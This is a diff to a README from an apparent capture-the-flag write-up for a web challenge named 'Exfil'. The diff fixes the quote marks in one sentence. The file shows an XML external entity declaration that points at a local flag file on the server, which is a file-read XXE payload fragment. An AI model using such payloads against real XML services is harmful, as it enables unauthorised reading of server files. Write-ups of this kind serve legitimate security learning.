ReginaThePumpkin/HackDef4-writeups/web/Exfil/README.md

 ### In this file there are two important lines that get us the flag

-This one that sets ´bar´ with the path wich interest us
+This one that sets `bar` with the path wich interest us
 ``` XML
  <!ENTITY bar SYSTEM "file:///app/app/flag.txt" >]>
 ```